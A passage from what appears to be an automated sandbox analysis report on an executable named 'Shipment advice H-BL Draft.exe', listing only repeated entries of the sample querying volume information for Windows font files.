                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
